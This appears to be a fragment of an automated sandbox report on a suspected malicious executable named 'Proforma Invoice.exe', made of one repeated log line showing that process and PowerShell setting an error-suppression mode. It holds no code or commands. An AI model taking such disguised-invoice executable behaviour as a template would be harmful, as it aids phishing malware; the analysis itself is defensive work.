                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
